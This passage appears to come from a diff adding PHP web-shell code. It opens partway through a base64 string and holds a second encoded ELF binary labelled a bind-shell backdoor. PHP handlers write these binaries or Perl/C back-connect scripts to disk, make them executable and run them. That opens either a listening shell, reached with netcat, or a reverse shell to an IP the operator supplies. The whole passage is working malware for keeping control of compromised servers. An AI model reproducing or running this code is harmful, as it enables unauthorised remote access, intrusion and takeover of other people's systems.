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2FycmF5X2VuZABfX2Rzb19oYW5kbGUAX19saWJjX2NzdV9maW5pAHN5c3RlbUBAR0xJQkNfMi4wAF9pbml0AGRhZW1vbkBAR0xJQkNfMi4wAF9zdGFydABzdHJsZW5AQEdMSUJDXzIuMABfX2ZpbmlfYXJyYXlfc3RhcnQAX19saWJjX2NzdV9pbml0AGluZXRfYWRkckBAR0xJQkNfMi4wAF9fYnNzX3N0YXJ0AG1haW4AX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfZW5kAGR1cDJAQEdMSUJDXzIuMABzdHJjYXRAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AF9maW5pAF9fcHJlaW5pdF9hcnJheV9lbmQAYnplcm9AQEdMSUJDXzIuMABleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABodG9uc0BAR0xJQkNfMi4wAGNvbm5lY3RAQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfc3RhcnQAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19wcmVpbml0X2FycmF5X3N0YXJ0AF9fZ21vbl9zdGFydF9fAA==";
+$backdoor = "f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAAD4EgAAAAAAADQAIAAHACgAIgAfAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIrAkAAKwJAAAFAAAAABAAAAEAAACsCQAArJkECKyZBAg0AQAAOAEAAAYAAAAAEAAAAgAAAMAJAADAmQQIwJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAAAAAAABEAAAATAAAAAAAAAAAAAAAQAAAAEQAAAAAAAAAAAAAACQAAAAgAAAAFAAAAAwAAAA0AAAAAAAAAAAAAAA8AAAAKAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAABAAAAAAAAAAcAAAALAAAAAAAAAAQAAAAMAAAADgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4AAAAAAAAAdQEAABIAAACgAAAAAAAAAHEAAAASAAAANAAAAAAAAADMAAAAEgAAAGoAAAAAAAAAWgAAABIAAABMAAAAAAAAAHgAAAASAAAAYwAAAAAAAAA5AAAAEgAAAFgAAAAAAAAAOQAAABIAAACOAAAAAAAAAOYAAAASAAAAOwAAAAAAAAA6AAAAEgAAAFMAAAAAAAAAOQAAABIAAAB1AAAAAAAAALkAAAASAAAAegAAAAAAAAArAAAAEgAAAEcAAAAAAAAAeAAAABIAAABvAAAAAAAAAA4AAAASAAAAfwAAAEiJBAgEAAAAEQAOAEAAAAAAAAAAOQAAABIAAAABAAAAAAAAAAAAAAAgAAAAFQAAAAAAAAAAAAAAIAAAAABfSnZfUmVnaXN0ZXJDbGFzc2VzAF9fZ21vbl9zdGFydF9fAGxpYmMuc28uNgBleGVjbABwZXJyb3IAZHVwMgBzb2NrZXQAc2VuZABhY2NlcHQAYmluZABzZXRzb2Nrb3B0AGxpc3RlbgBmb3JrAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABfX2xpYmNfc3RhcnRfbWFpbgBjbG9zZQBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAQACAAAAAAAAAAEAAQAkAAAAEAAAAAAAAAAQaWkNAAACAKYAAAAAAAAAiJoECAYSAACYmgQIBwEAAJyaBAgHAgAAoJoECAcDAACkmgQIBwQAAKiaBAgHBQAArJoECAcGAACwmgQIBwcAALSaBAgHCAAAuJoECAcJAAC8mgQIBwoAAMCaBAgHCwAAxJoECAcMAADImgQIBw0AAMyaBAgHDgAA0JoECAcQAABVieWD7AjoMQEAAOiDAQAA6FsEAADJwwD/NZCaBAj/JZSaBAgAAAAA/yWYmgQIaAAAAADp4P////8lnJoECGgIAAAA6dD/////JaCaBAhoEAAAAOnA/////yWkmgQIaBgAAADpsP////8lqJoECGggAAAA6aD/////JayaBAhoKAAAAOmQ/////yWwmgQIaDAAAADpgP////8ltJoECGg4AAAA6XD/////JbiaBAhoQAAAAOlg/////yW8mgQIaEgAAADpUP////8lwJoECGhQAAAA6UD/////JcSaBAhoWAAAAOkw/////yXImgQIaGAAAADpIP////8lzJoECGhoAAAA6RD/////JdCaBAhocAAAAOkA////Me1eieGD5PBQVFJorYgECGhciAQIUVZoQIYECOhf////9JCQVYnlU+gbAAAAgcO/FAAAg+wEi4P8////hcB0Av/Qg8QEW13Dixwkw1WJ5YPsCIA94JoECAB0DOscg8AEo9yaBAj/0qHcmgQIixCF0nXrxgXgmgQIAcnDVYnlg+wIobyZBAiFwHQSuAAAAACFwHQJxwQkvJkECP/QycOQkFWJ5VeD7GSD5PC4AAAAAIPAD4PAD8HoBMHgBCnEx0XkAQAAAMdF+EyJBAjHRCQIAAAAAMdEJAQBAAAAxwQkAgAAAOgJ////iUXwg33wAHkYxwQkjIkECOg0/v//xwQkAQAAAOio/v//ZsdF1AIAx0XYAAAAAItFDIPABIsAiQQk6Jv+//8Pt8CJBCTosP7//2aJRdbHRCQQBAAAAI1F5IlEJAzHRCQIAgAAAMdEJAQBAAAAi0XwiQQk6BL+//+NRdTHRCQIEAAA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L2NydG4uUwAxLmMAX0RZTkFNSUMAX19maW5pX2FycmF5X2VuZABfX2ZpbmlfYXJyYXlfc3RhcnQAX19pbml0X2FycmF5X2VuZABfR0xPQkFMX09GRlNFVF9UQUJMRV8AX19pbml0X2FycmF5X3N0YXJ0AGV4ZWNsQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZm9ya0BAR0xJQkNfMi4wAF9fZHNvX2hhbmRsZQBfX2xpYmNfY3N1X2ZpbmkAYWNjZXB0QEBHTElCQ18yLjAAX2luaXQAbGlzdGVuQEBHTElCQ18yLjAAc2V0c29ja29wdEBAR0xJQkNfMi4wAF9zdGFydABfX2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AGJpbmRAQEdMSUJDXzIuMABfZmluaQBleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfX2k2ODYuZ2V0X3BjX3RodW5rLmJ4AF9lbmQAc2VuZEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18A";
+
+function cf($fname,$text) {
+  $w_file=@fopen($fname,"w") or err();
+  if($w_file) {
+    @fputs($w_file,@base64_decode($text));
+    @fclose($w_file);
+  }
+}
+
+function cfb($fname,$text) {
+  $w_file=@fopen($fname,"w") or bberr();
+  if($w_file) {
+    @fputs($w_file,@base64_decode($text));
+    @fclose($w_file);
+  }
+}
+function err() { $_POST['backcconnmsge']="<br><br><div class=fxerrmsg>Error:</div> Can't connect!"; }
+function bberr() { $_POST['backcconnmsge']="<br><br><div class=fxerrmsg>Error:</div> Can't backdoor host!"; }
+
+if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd")) {
+  $ip = gethostbyname($_SERVER["HTTP_HOST"]);
+  $por = $_POST['backconnectport'];
+  if (is_writable(".")) {
+    cfb("shbd",$backdoor);
+    ex("chmod 777 shbd");
+    $cmd = "./shbd $por";
+    exec("$cmd > /dev/null &");
+    $scan = myshellexec("ps aux");
+  } else {
+    cfb("/tmp/shbd",$backdoor);
+    ex("chmod 777 /tmp/shbd");
+    $cmd = "./tmp/shbd $por";
+    exec("$cmd > /dev/null &");
+    $scan = myshellexec("ps aux");
+  }
+  if (eregi("./shbd $por",$scan)) {
+    $data = ("\n<br>Backdoor setup successfully.");
+  } else {
+    $data = ("\n<br>Process not found, backdoor setup failed!");
+  }
+  $_POST['backcconnmsg']="To connect, use netcat! Usage: <b>'nc $ip $por'</b>.$data";
+}
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl")) {
+  if (is_writable(".")) {
+    cf("back",$back_connect_pl);
+    $p2 = which("perl");
+    $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+    if (file_exists("back")) { unlink("back"); }
+  } else {
+    cf("/tmp/back",$back_connect_pl);
+    $p2 = which("perl");
+    $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+    if (file_exists("/tmp/back")) { unlink("/tmp/back"); }
+  }
+  $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+}
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C")) {
+  if (is_writable(".")) {
+    cf("backc",$back_connect_c);
+    ex("chmod 777 backc");
